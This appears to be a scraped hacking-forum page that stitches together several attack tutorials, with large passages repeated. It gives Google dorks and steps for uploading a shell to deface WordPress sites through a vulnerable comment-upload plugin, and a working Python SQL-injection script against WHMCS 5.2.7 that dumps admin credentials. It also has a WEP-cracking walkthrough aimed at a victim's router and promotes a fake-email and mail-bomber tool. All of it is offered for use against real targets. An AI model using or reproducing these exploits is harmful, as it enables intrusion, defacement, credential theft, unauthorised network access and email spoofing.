">
">
">
">
">
">
">
">
">
">
">
">
">
">
">
">
">
">
">
WORDPRESS EXPLOIT
You Can Hack Thousands of WordPress Websites With This Exploit.
And Thousands of WordPress websites Are Vulnerable For This Attack
Google Dorks For This WordPress Exploit.
Google Dork 1) “inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
Google Dork 2) /wp-content/plugins/easy-comment-uploads/upload-form.php
Google Dork 3) Index of /wp-content/plugins/easy-comment-uploads
Step 1
Open Google.com and Enter Any One Google Dork which Given,
Step 2
Now select any Website of WordPress.And Go To This
URL
VictimSite.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll Get Upload Option Here Posted Image
Now Upload Your Shell To Deface The Website ….
Step 3
And Now Check It Here
VictimSite.com/wp-content/uploads/2012/10/yourfilehere
And Thousands of WordPress websites Are Vulnerable For This Attack
Google Dorks For This WordPress Exploit.
Google Dork 1) “inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
Google Dork 2) /wp-content/plugins/easy-comment-uploads/upload-form.php
Google Dork 3) Index of /wp-content/plugins/easy-comment-uploads
Step 1
Open Google.com and Enter Any One Google Dork which Given,
Step 2
Now select any Website of WordPress.And Go To This
URL
VictimSite.com/wp-content/plugins/easy-comment-uploads/upload-form.php
You'll Get Upload Option Here Posted Image
Now Upload Your Shell To Deface The Website ….
Step 3
And Now Check It Here
VictimSite.com/wp-content/uploads/2012/10/yourfilehere
WHMCS 5.x.x SQL INJECTION
WHMCS 5.2.7 SQL Injection (2013.10.04)
--------------------------------------------------------------------------------------------------------
References:
http://localhost.re/p/whmcs-527-vulnerability
Code:
#!/usr/bin/env python
# 2013/10/03 - WHMCS 5.2.7 SQL Injection
# http://localhost.re/p/whmcs-527-vulnerability
url = 'http://clients.target.com/' # wopsie dopsie
user_email = 'mysuper@hacker.account' # just create a dummie account at /register.php
user_pwd = 'hacker'
import urllib, re, sys
from urllib2 import Request, urlopen
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17
Safari/537.36"
def exploit(sql):
print "Doing stuff: %s" % sql
r = urlopen(Request('%sclientarea.php?action=details' % url,
data="token=%s&firstname=%s&lastname=1&companyname=1&email=%s&paymentmethod=none&billingcid
=0&address1=1&address2=1&city=1&state=1&postcode=1&country=US&phonenumber=1&save=Save+Ch
anges" % (user[1], 'AES_ENCRYPT(1,1), firstname=%s' % sql, user_email), headers={"User-agent": ua,
"Cookie": user[0]})).read()
return re.search(r'(id="firstname" value="(.*?)")', r).group(2)
def login():
print "Getting CSRF token"
r = urlopen(Request('%slogin.php' % url, headers={"User-agent": ua}))
csrf = re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")',
r.read()).group(2)
cookie = r.info()['set-cookie'].split(';')[0]
print "Logging in"
r = urlopen(Request('%sdologin.php' % url, data="username=%s&password=%s&token=%s" %(user_email,
user_pwd, csrf), headers={"User-agent": ua, "Cookie": cookie})).read()
if 'dologin.php' in r:
sys.exit('Unable to login')
else:
return [cookie, re.search(r'(type="hidden" name="token" value="([0-9a-f]{40})")',
r).group(2)]
user = login()
print exploit('(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins)') # get
admins
print exploit('(SELECT * FROM (SELECT COUNT(id) FROM tblclients) as x)') # just get a count of clients
# oh you want to be evil
#exploit("'DISASTER', password=(SELECT * FROM (SELECT password FROM tblclients WHERE email='%s' LIMIT 1) as
x)#" % user_email)--------------------------------------------------------------------------------------------------------
References:
http://localhost.re/p/whmcs-527-vulnerability
WEP CRACKING TUTORIAL
WEP Cracking with Backtrack
First, you will need to have Backtrack 4 (LINK)
*** I find it that if you are smart enough to be into hacking you will atleast know how to burn an image file to a DVD, so after you do that, boot up the DVD in the and run BT4.
Login: root
Password: toor
Once logged in, type in: startx
BT4 is now set up, heres the following.
==
WEP CRACK GUIDE
1. Open konsole and type the following to start up network connections.
/etc/init.d/networking start
2. Now we are going to put the network card into monter mode by typing the following.
airmon-ng
(You will find your Interface here)
3. So first start up the scan
airmon-ng start wlan0 or 1
(depends on what it reads your card as, replace as needed)
4.Lets spoof your MAC address first by typing this next command.
ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up
This will make it so we change our MAC address to the computer we are connecting to
5.Time to start finding our victims router, type in konsole.
airodump-ng mon0
This will show the list and once you find one that suits your interest, Continue.
6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole
airodump-ng -c channel number, --bssid the BSSID of the router, -w what you want to save the cap file as, then mon0 (the interface we are using)
example: airodump-ng -c 1 - - bssid 11:22:33:44:55:66 -w wepcap mon0
7. Lets start the passkey cracking. We need to get around 20,000-50,000 IVs. We start by sending fake authentication requests. To do this open a new konsole and type:
aireplay-ng -1 1 -a The BSSID of the router, then the interface.
example: aireplay-ng -1 1 a 11:22:33:44:55:66 mon0
8. Almost done, we just need to contune the ARP cycle, open another konsole and type:
aireplay-ng -3 -b The BSSID of the router, then the interface, and it will start replaying ARPs.
Collect a good ammount of IVs like around 20k to 50k. Once its their, type CTRL - C to stop the process and continue to 9.
9. Time to start cracking that cap file :D Open a new konsole and type.
aircrack-ng -b (bssid) (file name)-01.cap
example: aircrack-ng 11:22:33:44:55:66 wepcap-01.cap
10. Now we should have the key to log in to the router, have fun enjoying your hacked wifi ;)
Here is some alternate methods of using backtrack to get from Hakunamatata69 Tutorial that are interesting and work too.
First, you will need to have Backtrack 4 (LINK)
*** I find it that if you are smart enough to be into hacking you will atleast know how to burn an image file to a DVD, so after you do that, boot up the DVD in the and run BT4.
Login: root
Password: toor
Once logged in, type in: startx
BT4 is now set up, heres the following.
==
WEP CRACK GUIDE
1. Open konsole and type the following to start up network connections.
/etc/init.d/networking start
2. Now we are going to put the network card into monter mode by typing the following.
airmon-ng
(You will find your Interface here)
3. So first start up the scan
airmon-ng start wlan0 or 1
(depends on what it reads your card as, replace as needed)
4.Lets spoof your MAC address first by typing this next command.
ifconfig wlan1 down
macchanger -r wlan1
ifconfig wlan1 up
This will make it so we change our MAC address to the computer we are connecting to
5.Time to start finding our victims router, type in konsole.
airodump-ng mon0
This will show the list and once you find one that suits your interest, Continue.
6. Once found press CTRL + C to copy the BSSID and then get out of airodump and then type into a new konsole
airodump-ng -c channel number, --bssid the BSSID of the router, -w what you want to save the cap file as, then mon0 (the interface we are using)
example: airodump-ng -c 1 - - bssid 11:22:33:44:55:66 -w wepcap mon0
7. Lets start the passkey cracking. We need to get around 20,000-50,000 IVs. We start by sending fake authentication requests. To do this open a new konsole and type:
aireplay-ng -1 1 -a The BSSID of the router, then the interface.
example: aireplay-ng -1 1 a 11:22:33:44:55:66 mon0
8. Almost done, we just need to contune the ARP cycle, open another konsole and type:
aireplay-ng -3 -b The BSSID of the router, then the interface, and it will start replaying ARPs.
Collect a good ammount of IVs like around 20k to 50k. Once its their, type CTRL - C to stop the process and continue to 9.
9. Time to start cracking that cap file :D Open a new konsole and type.
aircrack-ng -b (bssid) (file name)-01.cap
example: aircrack-ng 11:22:33:44:55:66 wepcap-01.cap
10. Now we should have the key to log in to the router, have fun enjoying your hacked wifi ;)
Here is some alternate methods of using backtrack to get from Hakunamatata69 Tutorial that are interesting and work too.
==
---ALTERNATE ATTACKS---
FRAGMENTATION
1. Konsole.
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap
==
CHOPCHOP
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK
***Be sure to open new Konsoles when necessary***
--
NOTES
Key Commands.
wlan0 = Interface (Examples: wlan0, ath0, eth0)
ch = The channel the target is on (Examples: 6, 11)
bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
ssid = Name of target (Examples: linksys, default)
filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)
---ALTERNATE ATTACKS---
FRAGMENTATION
1. Konsole.
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap
==
CHOPCHOP
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK
***Be sure to open new Konsoles when necessary***
--
NOTES
Key Commands.
wlan0 = Interface (Examples: wlan0, ath0, eth0)
ch = The channel the target is on (Examples: 6, 11)
bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)
ssid = Name of target (Examples: linksys, default)
filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)
fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)
PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)
Send Fake Email / Bomber / Custom Email Address TOOL DOWNLOAD
First, download the program [UPDATED VERSION!] here
VirusTotal
after downloading the program, run it and the program looks like this
![[Image: screenshot_17.png]](http://s5.postimg.org/tsmkysvkn/screenshot_17.png)
now fill all text field on the application
note (Click to View)
![[Image: screenshot_17.png]](http://s5.postimg.org/4l73kt32v/screenshot_17.png)
after you fill up all textfields, then click Send Email button and wait till you got message box.
done. Your email was successfully sent to the target. your email will be entered in the Inbox folder (tested on my GMail)
![[Image: screenshot_17.png]](http://s5.postimg.org/n3g1isa8n/screenshot_17.png)
![[Image: screenshot_20.png]](http://s5.postimg.org/64733iz13/screenshot_20.png)
